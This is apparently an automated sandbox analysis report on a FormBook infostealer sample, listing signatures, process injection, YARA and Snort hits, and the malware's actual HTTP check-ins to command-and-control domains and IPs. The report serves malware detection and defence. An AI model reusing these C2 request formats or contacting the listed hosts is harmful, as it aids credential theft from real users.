
Windows Analysis Report
TOgpmvvWoj.exe

Overview

General Information

Sample name: TOgpmvvWoj.exe (renamed because original name is a hash value)
Original sample name: 4815f332b8be3f9e2b173e71e751f994570fd23b0f7d3f7c519369f909f0b3c0.exe
Analysis ID: 1467718
MD5: 93e69765594e80ad7f8c1e906f145046
SHA1: f5d842cc344e4e1623dfcdd2ce32c73ee4ad05cb
SHA256: 4815f332b8be3f9e2b173e71e751f994570fd23b0f7d3f7c519369f909f0b3c0
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • TOgpmvvWoj.exe (PID: 6436 cmdline: "C:\Users\user\Desktop\TOgpmvvWoj.exe" MD5: 93E69765594E80AD7F8C1E906F145046)
    • svchost.exe (PID: 2120 cmdline: "C:\Users\user\Desktop\TOgpmvvWoj.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • ftlDDsmJxbqfWuvUNSEx.exe (PID: 6932 cmdline: "C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • clip.exe (PID: 7264 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
          • ftlDDsmJxbqfWuvUNSEx.exe (PID: 6404 cmdline: "C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7548 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.3762941792.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author | Strings
6.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
6.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
6.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
6.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2cd53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x162c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\TOgpmvvWoj.exe", CommandLine: "C:\Users\user\Desktop\TOgpmvvWoj.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\TOgpmvvWoj.exe", ParentImage: C:\Users\user\Desktop\TOgpmvvWoj.exe, ParentProcessId: 6436, ParentProcessName: TOgpmvvWoj.exe, ProcessCommandLine: "C:\Users\user\Desktop\TOgpmvvWoj.exe", ProcessId: 2120, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\TOgpmvvWoj.exe", CommandLine: "C:\Users\user\Desktop\TOgpmvvWoj.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\TOgpmvvWoj.exe", ParentImage: C:\Users\user\Desktop\TOgpmvvWoj.exe, ParentProcessId: 6436, ParentProcessName: TOgpmvvWoj.exe, ProcessCommandLine: "C:\Users\user\Desktop\TOgpmvvWoj.exe", ProcessId: 2120, ProcessName: svchost.exe
Snort IDS alerts:

Timestamp                  SID      Source Port  Destination Port  Protocol  Classtype
07/04/24-16:53:24.553352   2855464  49713        80                TCP       A Network Trojan was detected
07/04/24-16:55:29.149800   2855464  49741        80                TCP       A Network Trojan was detected
07/04/24-16:54:59.779589   2855464  49732        80                TCP       A Network Trojan was detected
07/04/24-16:52:54.789097   2855464  49706        80                TCP       A Network Trojan was detected
07/04/24-16:53:22.021315   2855464  49712        80                TCP       A Network Trojan was detected
07/04/24-16:54:48.852255   2855464  49729        80                TCP       A Network Trojan was detected
07/04/24-16:55:26.621590   2855464  49740        80                TCP       A Network Trojan was detected
07/04/24-16:55:02.327495   2855464  49733        80                TCP       A Network Trojan was detected
07/04/24-16:55:13.231476   2855464  49736        80                TCP       A Network Trojan was detected
07/04/24-16:53:58.144607   2855464  49720        80                TCP       A Network Trojan was detected
07/04/24-16:54:12.061387   2855464  49724        80                TCP       A Network Trojan was detected
07/04/24-16:55:42.557594   2855464  49745        80                TCP       A Network Trojan was detected
07/04/24-16:53:44.361554   2855464  49716        80                TCP       A Network Trojan was detected
07/04/24-16:55:15.777514   2855464  49737        80                TCP       A Network Trojan was detected
07/04/24-16:54:46.311846   2855464  49728        80                TCP       A Network Trojan was detected
07/04/24-16:54:00.682084   2855464  49721        80                TCP       A Network Trojan was detected
07/04/24-16:53:46.900097   2855464  49717        80                TCP       A Network Trojan was detected
07/04/24-16:52:52.254180   2855464  49705        80                TCP       A Network Trojan was detected
07/04/24-16:54:14.588408   2855464  49725        80                TCP       A Network Trojan was detected
07/04/24-16:55:40.027987   2855464  49744        80                TCP       A Network Trojan was detected


AV Detection

Source: http://www.sandranoll.com/aroo/ | Avira URL Cloud: Label: malware
Source: http://www.xn--matfrmn-jxa4m.se/4hda/ | Avira URL Cloud: Label: malware
Source: http://www.sandranoll.com/aroo/?fhW=BLvXr6e0EhyxeX&YbCL=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGG0QhvMR72FivEUbGSmkuxinEDBYWWrvqFUEDSzpZ60+MRxZstpJridvk | Avira URL Cloud: Label: malware
Source: http://www.xn--matfrmn-jxa4m.se/4hda/?YbCL=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9/f3zij1q4lqhkHJ2CNqkydCYpEmp0eXiAcXcwGmcRWkkIq9RVVQfBdjK&fhW=BLvXr6e0EhyxeX | Avira URL Cloud: Label: malware
Source: TOgpmvvWoj.exe | ReversingLabs: Detection: 60%
Source: Yara match | File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3762941792.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3758152425.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3763129724.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1486102715.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3763045399.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: TOgpmvvWoj.exe | Joe Sandbox ML: detected
Source: TOgpmvvWoj.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000000.1411571684.000000000030E000.00000002.00000001.01000000.00000005.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000000.1556057454.000000000030E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP | source: TOgpmvvWoj.exe, 00000004.00000003.1301147279.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, TOgpmvvWoj.exe, 00000004.00000003.1298508688.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485647293.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485647293.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1396440551.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1398141581.0000000003200000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3763569921.00000000049A0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3763569921.0000000004B3E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000009.00000003.1484930871.0000000004630000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000003.1488364602.00000000047EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: TOgpmvvWoj.exe, 00000004.00000003.1301147279.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, TOgpmvvWoj.exe, 00000004.00000003.1298508688.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000006.00000002.1485647293.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485647293.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1396440551.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1398141581.0000000003200000.00000004.00000020.00020000.00000000.sdmp, clip.exe, clip.exe, 00000009.00000002.3763569921.00000000049A0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3763569921.0000000004B3E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000009.00000003.1484930871.0000000004630000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000003.1488364602.00000000047EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: clip.pdb | source: svchost.exe, 00000006.00000003.1453476434.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485400848.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000002.3762132057.0000000001268000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: clip.exe, 00000009.00000002.3758257175.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3768118603.0000000004FCC000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1774720636.0000000039A3C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: clip.exe, 00000009.00000002.3758257175.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3768118603.0000000004FCC000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1774720636.0000000039A3C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: clip.pdbGCTL | source: svchost.exe, 00000006.00000003.1453476434.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485400848.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000002.3762132057.0000000001268000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E74696 GetFileAttributesW,FindFirstFileW,FindClose, 4_2_00E74696
Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E7C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 4_2_00E7C9C7
Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E7C93C FindFirstFileW,FindClose, 4_2_00E7C93C
Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E7F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 4_2_00E7F200
Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E7F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 4_2_00E7F35D
Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E7F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 4_2_00E7F65E
Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E73A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 4_2_00E73A2B
Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E73D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 4_2_00E73D4E
Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E7BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 4_2_00E7BF27
Source: C:\Windows\SysWOW64\clip.exe | Code function: 9_2_02A2BC20 FindFirstFileW,FindNextFileW,FindClose, 9_2_02A2BC20
Source: C:\Windows\SysWOW64\clip.exe | Code function: 4x nop then xor eax, eax 9_2_02A19870
Source: C:\Windows\SysWOW64\clip.exe | Code function: 4x nop then mov ebx, 00000004h 9_2_047D053E

Networking

Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49705 -> 217.160.0.106:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49706 -> 217.160.0.106:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49712 -> 208.91.197.27:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49713 -> 208.91.197.27:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49716 -> 43.252.167.188:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49717 -> 43.252.167.188:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49720 -> 194.9.94.85:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49721 -> 194.9.94.85:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49724 -> 23.251.54.212:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49725 -> 23.251.54.212:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49728 -> 199.192.19.19:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49729 -> 199.192.19.19:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49732 -> 213.145.228.16:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49733 -> 213.145.228.16:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49736 -> 91.195.240.19:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49737 -> 91.195.240.19:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49740 -> 194.58.112.174:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49741 -> 194.58.112.174:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49744 -> 172.67.210.102:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49745 -> 172.67.210.102:80
Source: Joe Sandbox View | IP Address: 23.251.54.212
Source: Joe Sandbox View | IP Address: 213.145.228.16
Source: Joe Sandbox View | IP Address: 194.9.94.85
Source: Joe Sandbox View | ASN Name: VPSQUANUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: DOMAINTECHNIKAT
Source: Joe Sandbox View | ASN Name: LOOPIASE
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (14 identical entries)
Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E825E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 4_2_00E825E2
Source: global traffic | HTTP traffic detected: GET /w6qg/?fhW=BLvXr6e0EhyxeX&YbCL=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CazhdUSIVLCtkAjvELp631DJLKvEqqNibis4AF0Y/xQXWBRPCD91/FJrEz HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Host: www.hprlz.cz
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /qe66/?YbCL=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv+z+o+Zy5RZ1L4zwBfly91+2hSvhVojey3gmTZ6j57PRX7U3n66rWnGeG&fhW=BLvXr6e0EhyxeX HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Host: www.catherineviskadi.com
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /xzzi/?fhW=BLvXr6e0EhyxeX&YbCL=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/T4RMdgNWnwSdCIYHgMQCJ4NovZBdigdGOlTiGNjGNRbnTmMSUCfOcFfR HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Host: www.bfiworkerscomp.com
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /rm91/?fhW=BLvXr6e0EhyxeX&YbCL=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WH8ALvnjmtlYhpciewdwpfxiI173pYZLp0P/Ncxt8Rkrw2XK7hs/fa/r1 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Host: www.xn--fhq1c541j0zr.com
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /4hda/?YbCL=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9/f3zij1q4lqhkHJ2CNqkydCYpEmp0eXiAcXcwGmcRWkkIq9RVVQfBdjK&fhW=BLvXr6e0EhyxeX HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Host: www.xn--matfrmn-jxa4m.se
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /li0t/?fhW=BLvXr6e0EhyxeX&YbCL=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfmjHLM7Y8ZEUPvisCvQ4bRBJc30+1Sfiya8KVn3bitTBOxY938FEQPd1w HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Host: www.anuts.top
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /ei85/?YbCL=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXmSJOUDfP2hLYj3hfUWwVMjhSgAyvEJN1ww7Of4RepeBVRZKy4AbjBLzj&fhW=BLvXr6e0EhyxeX HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Host: www.telwisey.info
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /aroo/?fhW=BLvXr6e0EhyxeX&YbCL=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGG0QhvMR72FivEUbGSmkuxinEDBYWWrvqFUEDSzpZ60+MRxZstpJridvk HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Host: www.sandranoll.com
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /tf44/?YbCL=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciyxdfJd/gaB8T0bTbhtXVrFmCpPW1iSF+B9h4XvImdTXjqQBmtK+ZYAHNG&fhW=BLvXr6e0EhyxeX HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Host: www.gipsytroya.com
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /mooq/?fhW=BLvXr6e0EhyxeX&YbCL=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGmvwMEDU2l3Vk/j3vF3XZl1x4VY01FUKFB6WA/ZrLtnyfA2FlJPqZ/llT HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Host: www.helpers-lion.online
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
